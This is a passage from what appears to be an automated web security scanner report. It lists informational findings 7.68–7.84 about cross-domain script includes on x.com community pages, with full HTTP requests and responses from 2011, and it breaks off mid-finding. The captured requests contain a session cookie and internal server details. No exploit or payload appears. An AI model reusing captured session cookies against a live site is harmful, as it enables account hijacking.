...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.68. https://www.x.com/community/ppx/xspaces

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=109016 t=1313156344652941
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.69. https://www.x.com/community/ppx/xspaces/accelerator

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/accelerator

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/accelerator HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:53 GMT; Path=/
Vary: User-Agent
JP: D=58190 t=1313157053423426
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.70. https://www.x.com/community/ppx/xspaces/certification

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/certification

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/certification HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035333b31342c323035313b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b31342c323031393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:37 GMT; Path=/
Vary: User-Agent
JP: D=85471 t=1313157037367616
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.71. https://www.x.com/community/ppx/xspaces/cloud-computing

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/cloud-computing

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/cloud-computing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323030373b31342c323035313b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:38 GMT; Path=/
Vary: User-Agent
JP: D=94000 t=1313157038315262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.72. https://www.x.com/community/ppx/xspaces/digital_goods

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/digital_goods HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323035313b31342c323131323b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=155072 t=1313157039623431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.73. https://www.x.com/community/ppx/xspaces/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/finance HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323131323b31342c323034383b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=82568 t=1313157040529050
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.74. https://www.x.com/community/ppx/xspaces/forums

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/forums HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=123822 t=1313157052865732
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.75. https://www.x.com/community/ppx/xspaces/gaming

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/gaming HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=82477 t=1313157046859519
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.76. https://www.x.com/community/ppx/xspaces/identity

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/identity HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=98694 t=1313157041495583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.77. https://www.x.com/community/ppx/xspaces/innovate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/innovate HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=172927 t=1313157048855371
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.78. https://www.x.com/community/ppx/xspaces/introduce

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.79. https://www.x.com/community/ppx/xspaces/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/mobile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323030393b31342c323030333b31342c323031313b31342c323030373b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:35 GMT; Path=/
Vary: User-Agent
JP: D=93891 t=1313157035030578
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.80. https://www.x.com/community/ppx/xspaces/mobile/mecl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mecl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/mobile/mecl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=118072 t=1313157044365221
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.81. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mobile_ec

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/mobile/mobile_ec HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=244511 t=1313157043858374
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.82. https://www.x.com/community/ppx/xspaces/security

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/security HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:55 GMT; Path=/
Vary: User-Agent
JP: D=117938 t=1313157055856107
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.83. https://www.x.com/community/ppx/xspaces/social

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/social HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=146095 t=1313157047611313
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.84. https://www.x.com/community/ppx/xspaces/subscriptions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /community/ppx/xspaces/subscriptions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
